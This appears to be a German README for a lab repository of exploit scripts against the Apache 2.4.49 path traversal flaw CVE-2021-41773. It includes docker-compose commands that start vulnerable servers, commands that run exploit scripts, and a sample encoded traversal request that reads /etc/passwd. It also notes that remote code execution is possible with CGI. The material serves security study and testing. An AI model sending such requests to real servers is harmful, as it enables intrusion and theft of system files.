
Exploit-Skripte für die Apache HTTP Server 2.4.49 Verzeichnisüberschreitungssicherheitslücke (CVE-2021-41773), die Pfadüberschreitung und potenzielle RCE durch manipulierte HTTP-Anfragen ermöglicht.
docker-compose up -d --build vuln-server-no-cgid
python no-cgid/exploit.py
docker-compose up -d --build vuln-server-cgid-sh
python cgid-sh/exploit.py
Verzeichnisüberschreitungs-Schwachstelle in Apache HTTP Server 2.4.49. Sie tritt auf, wenn Require all denied nicht gesetzt ist.
Wenn eine mit %2e kodierte URL empfangen wird, wird der Zugriff auf übergeordnete Verzeichnisse ermöglicht. Beispiel: GET /cgi-bin/%2e%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd
Wenn CGI aktiviert ist, ist RCE möglich.
Aufgrund einer unzureichenden Behebung dieser Schwachstelle existiert die Apache HTTP Server 2.4.50-Schwachstelle CVE-2021-42013.